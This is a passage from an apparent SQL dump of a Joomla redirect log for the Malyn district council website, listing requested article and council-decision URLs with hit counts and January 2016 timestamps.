00:00:00',301),(23815,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-1046-18-111','','','',10,0,'2016-01-02 21:18:16','0000-00-00 00:00:00',301),(23816,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1208-pro-vnesennya-zmin-do-polozhennya-pro-postijni-komisiji-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',11,0,'2016-01-02 21:19:18','0000-00-00 00:00:00',301),(23817,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1156:2013-12-09-07-12-03&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-02 21:40:32','0000-00-00 00:00:00',301),(23818,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=805:2012-10-30-13-35-53&lang=ru&option=com_content&view=article','','','',3,0,'2016-01-02 21:42:57','0000-00-00 00:00:00',301),(23819,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=592:2012-02-27-15-06-10&catid=36&Itemid=70&lang=uk','','','',1,0,'2016-01-02 21:45:56','0000-00-00 00:00:00',301),(23820,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1170:2014-01-08-11-02-06&Itemid=14&lang=uk&option=com_content&view=article','','','',6,0,'2016-01-02 21:46:02','0000-00-00 00:00:00',301),(23821,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1283:2014-04-15-16-30-00&Itemid=14&lang=uk&option=com_content&view=article','','','',5,0,'2016-01-02 21:48:20','0000-00-00 00:00:00',301),(23822,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=509:2011-12-20-08-03-11&Itemid=73&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-02 21:52:01','0000-00-00 00:00:00',301),(23823,'http://www.malyn-rayrada.org.ua/cache/cache-db.php','','','',1,0,'2016-01-02 21:57:00','0000-00-00 00:00:00',301),(23824,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=679:2012-05-17-10-00-53&Itemid=80&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-02 22:00:43','0000-00-00 00:00:00',301),(23825,'http://www.malyn-rayrada.org.ua/index.php?catid=54:--29112013-&id=1141:2013-11-26-13-18-12&Itemid=95&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-02 22:03:40','0000-00-00 00:00:00',301),(23826,'http://www.malyn-rayrada.org.ua/index.php?catid=52:--16082013-&id=1067:2013-08-16-15-28-50&Itemid=93&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-02 22:05:41','0000-00-00 00:00:00',301),(23828,'http://www.malyn-rayrada.org.ua/index.php?catid=30:--30122010-&id=230:---3----6--30--2010-&Itemid=61&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-02 22:09:54','0000-00-00 00:00:00',301),(23829,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=963:2013-03-13-06-16-53&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2016-01-02 22:13:51','0000-00-00 00:00:00',301),(23830,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1071:2013-08-27-14-06-18&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-02 22:18:10','0000-00-00 00:00:00',301),(23831,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1058:-2013-&Itemid=92&lang=en&option=com_content&view=article','','','',1,0,'2016-01-02 22:38:33','0000-00-00 00:00:00',301),(23832,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=89&lang=en&limitstart=5','','','',7,0,'2016-01-02 22:40:44','0000-00-00 00:00:00',301),(23833,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1105:2013-10-11-16-43-25&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-02 22:53:14','0000-00-00 00:00:00',301),(23834,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=750:2012-09-01-09-40-02&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-02 22:53:37','0000-00-00 00:00:00',301),(23835,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=773:2012-10-02-06-48-57&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-02 22:54:36','0000-00-00 00:00:00',301),(23836,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=583:-l-lr&Itemid=77&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-02 22:55:32','0000-00-00 00:00:00',301),(23837,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=609:-q-q&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-02 22:55:43','0000-00-00 00:00:00',301),(23838,'http://www.malyn-rayrada.org.ua/index.php?catid=31&id=270:-4-6-&Itemid=62&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-02 22:56:24','0000-00-00 00:00:00',301),(23839,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1336:2014-06-10-11-01-06&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-02 22:56:35','0000-00-00 00:00:00',301),(23840,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1155:2013-12-07-15-56-12&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-02 22:57:58','0000-00-00 00:00:00',301),(23841,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1082:------------2012-2015-&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-01-02 22:58:10','0000-00-00 00:00:00',301),(23842,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=860:09&lang=en&option=com_content&view=article','','','',2,0,'2016-01-02 22:58:30','0000-00-00 00:00:00',301),(23843,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=815:-16-6-&lang=ru&option=com_content&view=article','','','',4,0,'2016-01-02 22:58:36','0000-00-00 00:00:00',301),(23844,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1266:2014-04-03-05-25-14&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2016-01-02 22:58:48','0000-00-00 00:00:00',301),(23845,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=690:2012-05-29-18-50-09&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-02 22:59:01','0000-00-00 00:00:00',301),(23846,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1157:-----------11--2013-&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-02 22:59:30','0000-00-00 00:00:00',301),(23847,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=646:2012-04-08-07-58-55&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-02 22:59:36','0000-00-00 00:00:00',301),(23848,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=987:2013-04-15-06-06-41&Itemid=88&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-02 23:01:24','0000-00-00 00:00:00',301),(23849,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1208:2014-01-31-13-48-49&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2016-01-02 23:01:59','0000-00-00 00:00:00',301),(23850,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=933:-2013-2017-&Itemid=86&lang=en&option=com_content&view=article','','','',2,0,'2016-01-02 23:17:59','0000-00-00 00:00:00',301),(23851,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=670:2012-05-08-05-15-51&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-02 23:25:23','0000-00-00 00:00:00',301),(23852,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=689:2012-05-29-17-48-13&lang=en&option=com_content&view=article','','','',4,0,'2016-01-03 00:00:37','0000-00-00 00:00:00',301),(23853,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1056:-22-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 00:20:41','0000-00-00 00:00:00',301),(23854,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1013:2013-06-01-03-58-38&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 00:22:56','0000-00-00 00:00:00',301),(23855,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=637:2012-04-03-12-34-11&Itemid=80&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 00:29:52','0000-00-00 00:00:00',301),(23856,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=842:2012-12-10-13-55-57&Itemid=85&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 00:30:27','0000-00-00 00:00:00',301),(23857,'http://www.malyn-rayrada.org.ua/index.php?id=38:--19122011-&Itemid=73&lang=ru&layout=blog&limitstart=40&option=com_content&view=category','','','',1,0,'2016-01-03 00:31:57','0000-00-00 00:00:00',301),(23858,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1208:2014-01-31-13-48-49&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 00:32:31','0000-00-00 00:00:00',301),(23859,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=969:-2013-&Itemid=85&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 00:32:44','0000-00-00 00:00:00',301),(23860,'http://www.malyn-rayrada.org.ua/index.php?catid=44&id=757:2012-09-12-09-47-49&Itemid=83&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 00:33:42','0000-00-00 00:00:00',301),(23861,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=643:-6-&Itemid=80&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 00:35:16','0000-00-00 00:00:00',301),(23862,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1062:2013-07-29-13-33-29&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 00:58:06','0000-00-00 00:00:00',301),(23863,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=644:2012-04-04-09-52-48&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 01:08:20','0000-00-00 00:00:00',301),(23864,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1073:2013-08-30-11-12-19&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 01:08:51','0000-00-00 00:00:00',301),(23865,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=450:-l-2011-2013-r&Itemid=73&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 01:09:32','0000-00-00 00:00:00',301),(23866,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1155:2013-12-07-15-56-12&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 01:09:49','0000-00-00 00:00:00',301),(23867,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=884:2012-12-24-10-46-13&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 01:10:11','0000-00-00 00:00:00',301),(23868,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=805:2012-10-30-13-35-53&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 01:10:41','0000-00-00 00:00:00',301),(23869,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=452:-20-2011-100-l-r-&Itemid=73&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 01:10:48','0000-00-00 00:00:00',301),(23870,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1146:2013-11-27-10-09-00&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 01:11:06','0000-00-00 00:00:00',301),(23871,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1100:2013-10-02-18-03-10&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 01:11:28','0000-00-00 00:00:00',301),(23872,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1089:--------l---r---&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 01:11:37','0000-00-00 00:00:00',301),(23873,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=506:-lr&Itemid=73&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 01:11:51','0000-00-00 00:00:00',301),(23874,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1157:-----------11--2013-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 01:12:51','0000-00-00 00:00:00',301),(23875,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=591:2012-02-27-14-31-33&catid=40&Itemid=77&lang=ru','','','',2,0,'2016-01-03 01:46:30','0000-00-00 00:00:00',301),(23876,'http://malyn-rayrada.org.ua/index.php/580-upravlinnja-statistiki-v-m-malin-informue_2?tmpl=component&print=1&layout=default&page=','','','',10,0,'2016-01-03 03:26:32','0000-00-00 00:00:00',301),(23877,'http://malyn-rayrada.org.ua/index.php/589-pogodzhennja-na-remont-navchalnogo-zakladu-v-smt?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-01-03 03:26:34','0000-00-00 00:00:00',301),(23878,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1254-pro-vnesennya-zmin-do-polozhennya-pro-teritorialnij-tsentr-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu','','','',1,0,'2016-01-03 05:28:55','0000-00-00 00:00:00',301),(23879,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1275-pro-pogodzhennya-zvilnennya-z-posadi-direktora-rajonnogo-budinku-kulturi-vishnevskoji-o-v','','','',1,0,'2016-01-03 06:09:33','0000-00-00 00:00:00',301),(23880,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1267-pro-programu-zabezpechennya-deputatskoji-diyalnosti-na-2016-rik','','','',1,0,'2016-01-03 06:17:59','0000-00-00 00:00:00',301),(23881,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=682:-2012-&catid=42:--16052012-&Itemid=80&lang=uk','','','',2,0,'2016-01-03 07:04:12','0000-00-00 00:00:00',301),(23882,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=587:2012-02-27-13-44-05&catid=40&Itemid=77&lang=uk','','','',3,0,'2016-01-03 07:36:26','0000-00-00 00:00:00',301),(23883,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1284-pro-pilgovij-projizd-uchniv-ta-pedagogichnikh-pratsivnikiv-zakladiv-osviti-malinskogo-rajonu-na-2016-rik','','','',1,0,'2016-01-03 10:11:17','0000-00-00 00:00:00',301),(23884,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=479:2011-11-28-07-33-14&catid=38&Itemid=73&lang=uk','','','',3,0,'2016-01-03 10:51:27','0000-00-00 00:00:00',301),(23885,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/908-pro-prisvoennya-chergovogo-rangu-posadovoji-osobi-mistsevogo-samovryaduvannya-golovi-rajonnoji-radi','','','',9,0,'2016-01-03 12:08:35','0000-00-00 00:00:00',301),(23886,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15&lang=en&Itemid=0','','','',1,0,'2016-01-03 12:11:09','0000-00-00 00:00:00',301),(23887,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=182:2010-12-03-12-31-34&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',1,0,'2016-01-03 12:11:53','0000-00-00 00:00:00',301),(23888,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=184:-15-1000-&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',1,0,'2016-01-03 12:11:56','0000-00-00 00:00:00',301),(23889,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=228:-2011-&catid=30:--30122010-&Itemid=61&lang=uk','','','',1,0,'2016-01-03 12:11:58','0000-00-00 00:00:00',301),(23890,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=331:2011-05-20-16-30-09&catid=33&Itemid=66&lang=en','','','',1,0,'2016-01-03 12:12:02','0000-00-00 00:00:00',301),(23891,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=331:2011-05-20-16-30-09&catid=33&Itemid=66&lang=ru','','','',1,0,'2016-01-03 12:12:04','0000-00-00 00:00:00',301),(23892,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=333:-2011-&catid=33&Itemid=66&lang=en','','','',1,0,'2016-01-03 12:12:06','0000-00-00 00:00:00',301),(23893,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=333:-2011-&catid=33&Itemid=66&lang=ru','','','',1,0,'2016-01-03 12:12:09','0000-00-00 00:00:00',301),(23894,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=613:2012-03-26-14-13-34&catid=11&lang=en&Itemid=','','','',1,0,'2016-01-03 12:12:17','0000-00-00 00:00:00',301),(23895,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=613:2012-03-26-14-13-34&catid=11&lang=uk&Itemid=','','','',1,0,'2016-01-03 12:12:21','0000-00-00 00:00:00',301),(23896,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=621:-2012-&catid=40&Itemid=77&lang=en','','','',2,0,'2016-01-03 12:12:23','0000-00-00 00:00:00',301),(23897,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=621:-2012-&catid=40&Itemid=77&lang=ru','','','',2,0,'2016-01-03 12:12:26','0000-00-00 00:00:00',301),(23898,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=621:-2012-&catid=40:--28032012-&Itemid=77&lang=ru','','','',2,0,'2016-01-03 12:12:29','0000-00-00 00:00:00',301),(23899,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=659:-2011-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2016-01-03 12:12:37','0000-00-00 00:00:00',301),(23900,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=665:-75-&catid=11&lang=uk&Itemid=','','','',1,0,'2016-01-03 12:12:45','0000-00-00 00:00:00',301),(23901,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=665:-75-&catid=11&lang=uk&Itemid=0','','','',1,0,'2016-01-03 12:12:47','0000-00-00 00:00:00',301),(23902,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=669:-2011-56-&catid=11&lang=en','','','',1,0,'2016-01-03 12:12:49','0000-00-00 00:00:00',301),(23903,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=669:-2011-56-&catid=11&lang=en&Itemid=0','','','',1,0,'2016-01-03 12:12:55','0000-00-00 00:00:00',301),(23904,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=669:-2011-56-&catid=11&lang=ru','','','',1,0,'2016-01-03 12:12:58','0000-00-00 00:00:00',301),(23905,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=669:-2011-56-&catid=11&lang=ru&Itemid=','','','',1,0,'2016-01-03 12:13:01','0000-00-00 00:00:00',301),(23906,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=669:-2011-56-&catid=11&lang=ru&Itemid=0','','','',1,0,'2016-01-03 12:13:03','0000-00-00 00:00:00',301),(23907,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=669:-2011-56-&catid=11&lang=uk&Itemid=','','','',1,0,'2016-01-03 12:13:07','0000-00-00 00:00:00',301),(23908,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=669:-2011-56-&catid=11&lang=uk&Itemid=0','','','',1,0,'2016-01-03 12:13:11','0000-00-00 00:00:00',301),(23909,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=671:2012-05-09-13-09-05&catid=11&lang=en&Itemid=','','','',1,0,'2016-01-03 12:13:14','0000-00-00 00:00:00',301),(23910,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=671:2012-05-09-13-09-05&catid=11&lang=en&Itemid=0','','','',1,0,'2016-01-03 12:13:17','0000-00-00 00:00:00',301),(23911,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=671:2012-05-09-13-09-05&catid=11&lang=ru&Itemid=','','','',1,0,'2016-01-03 12:13:19','0000-00-00 00:00:00',301),(23912,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=671:2012-05-09-13-09-05&catid=11&lang=ru&Itemid=0','','','',1,0,'2016-01-03 12:13:22','0000-00-00 00:00:00',301),(23913,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=671:2012-05-09-13-09-05&catid=11&lang=uk','','','',1,0,'2016-01-03 12:13:25','0000-00-00 00:00:00',301),(23914,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=671:2012-05-09-13-09-05&catid=11&lang=uk&Itemid=','','','',1,0,'2016-01-03 12:13:28','0000-00-00 00:00:00',301),(23915,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=671:2012-05-09-13-09-05&catid=11&lang=uk&Itemid=0','','','',1,0,'2016-01-03 12:13:30','0000-00-00 00:00:00',301),(23916,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=675:2012-05-17-09-49-52&catid=42&Itemid=80&lang=ru','','','',1,0,'2016-01-03 12:13:33','0000-00-00 00:00:00',301),(23917,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=675:2012-05-17-09-49-52&catid=42:--16052012-&Itemid=80&lang=ru','','','',1,0,'2016-01-03 12:13:38','0000-00-00 00:00:00',301),(23918,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=675:2012-05-17-09-49-52&catid=42:--16052012-&Itemid=80&lang=uk','','','',1,0,'2016-01-03 12:13:41','0000-00-00 00:00:00',301),(23919,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=676:2012-05-17-09-52-12&catid=42&Itemid=80&lang=ru','','','',1,0,'2016-01-03 12:13:47','0000-00-00 00:00:00',301),(23920,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=677:------------2012-2015-&catid=42&Itemid=80&lang=ru','','','',2,0,'2016-01-03 12:14:02','0000-00-00 00:00:00',301),(23921,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=681:16-13-&catid=11&lang=uk&Itemid=','','','',1,0,'2016-01-03 12:14:16','0000-00-00 00:00:00',301),(23922,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=681:16-13-&catid=11&lang=uk&Itemid=0','','','',1,0,'2016-01-03 12:14:19','0000-00-00 00:00:00',301),(23923,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=688:2012-05-25-16-34-51&catid=11&lang=uk&Itemid=0','','','',1,0,'2016-01-03 12:14:33','0000-00-00 00:00:00',301),(23924,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=689:2012-05-29-17-48-13&catid=11&lang=en&Itemid=','','','',2,0,'2016-01-03 12:14:38','0000-00-00 00:00:00',301),(23925,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=690:2012-05-29-18-50-09&catid=11&lang=en&Itemid=','','','',1,0,'2016-01-03 12:14:43','0000-00-00 00:00:00',301),(23926,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=692:-2012&catid=11&lang=en&Itemid=','','','',1,0,'2016-01-03 12:14:45','0000-00-00 00:00:00',301),(23927,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=692:-2012&catid=11&lang=uk','','','',1,0,'2016-01-03 12:14:49','0000-00-00 00:00:00',301),(23928,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=696:-14-6-&catid=11&lang=en&Itemid=','','','',1,0,'2016-01-03 12:14:52','0000-00-00 00:00:00',301),(23929,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=696:-14-6-&catid=11&lang=en&Itemid=0','','','',1,0,'2016-01-03 12:14:54','0000-00-00 00:00:00',301),(23930,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=696:-14-6-&catid=11&lang=ru&Itemid=','','','',1,0,'2016-01-03 12:14:57','0000-00-00 00:00:00',301),(23931,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=696:-14-6-&catid=11&lang=uk','','','',1,0,'2016-01-03 12:14:59','0000-00-00 00:00:00',301),(23932,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=698:-6-16112010-5-&catid=43&Itemid=82&lang=en','','','',1,0,'2016-01-03 12:15:02','0000-00-00 00:00:00',301),(23933,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=698:-6-16112010-5-&catid=43&Itemid=82&lang=ru','','','',1,0,'2016-01-03 12:15:04','0000-00-00 00:00:00',301),(23934,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=698:-6-16112010-5-&catid=43:--25072012-&Itemid=82&lang=en','','','',1,0,'2016-01-03 12:15:08','0000-00-00 00:00:00',301),(23935,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=698:-6-16112010-5-&catid=43:--25072012-&Itemid=82&lang=ru','','','',1,0,'2016-01-03 12:15:11','0000-00-00 00:00:00',301),(23936,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=699:-2011-2015-&catid=43&Itemid=82&lang=en','','','',1,0,'2016-01-03 12:15:13','0000-00-00 00:00:00',301),(23937,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=699:-2011-2015-&catid=43&Itemid=82&lang=ru','','','',2,0,'2016-01-03 12:15:16','0000-00-00 00:00:00',301),(23938,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=6:2010-06-05-14-26-47&catid=6&Itemid=9&lang=en','','','',1,0,'2016-01-03 12:15:21','0000-00-00 00:00:00',301),(23939,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=6:2010-06-05-14-26-47&catid=6&Itemid=9&lang=ru','','','',1,0,'2016-01-03 12:15:24','0000-00-00 00:00:00',301),(23940,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=701:-2011-2017-&catid=43&Itemid=82&lang=en','','','',1,0,'2016-01-03 12:15:31','0000-00-00 00:00:00',301),(23941,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=701:-2011-2017-&catid=43&Itemid=82&lang=ru','','','',1,0,'2016-01-03 12:15:35','0000-00-00 00:00:00',301),(23942,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=706:-qq-2012-2015-&catid=43:--25072012-&Itemid=82&lang=en','','','',1,0,'2016-01-03 12:15:37','0000-00-00 00:00:00',301),(23943,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=706:-qq-2012-2015-&catid=43:--25072012-&Itemid=82&lang=ru','','','',1,0,'2016-01-03 12:15:39','0000-00-00 00:00:00',301),(23944,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=706:-qq-2012-2015-&catid=43:--25072012-&Itemid=82&lang=uk','','','',1,0,'2016-01-03 12:15:42','0000-00-00 00:00:00',301),(23945,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=710:2012-06-14-15-07-29&catid=43&Itemid=82&lang=en','','','',2,0,'2016-01-03 12:15:45','0000-00-00 00:00:00',301),(23946,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=711:2012-06-14-15-09-26&catid=43&Itemid=82&lang=en','','','',1,0,'2016-01-03 12:15:54','0000-00-00 00:00:00',301),(23947,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=711:2012-06-14-15-09-26&catid=43&Itemid=82&lang=ru','','','',2,0,'2016-01-03 12:15:56','0000-00-00 00:00:00',301),(23948,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=711:2012-06-14-15-09-26&catid=43:--25072012-&Itemid=82&lang=ru','','','',1,0,'2016-01-03 12:16:01','0000-00-00 00:00:00',301),(23949,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=712:2012-06-14-15-11-24&catid=43&Itemid=82&lang=ru','','','',1,0,'2016-01-03 12:16:07','0000-00-00 00:00:00',301),(23950,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=724:-27042012252&catid=43:--25072012-&Itemid=82&lang=ru','','','',12,0,'2016-01-03 12:16:47','0000-00-00 00:00:00',301),(23951,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=733:-10-&catid=11&lang=en&Itemid=0','','','',1,0,'2016-01-03 12:17:43','0000-00-00 00:00:00',301),(23952,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=733:-10-&catid=11&lang=ru&Itemid=0','','','',1,0,'2016-01-03 12:17:46','0000-00-00 00:00:00',301),(23953,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=733:-10-&catid=11&lang=uk&Itemid=0','','','',1,0,'2016-01-03 12:17:50','0000-00-00 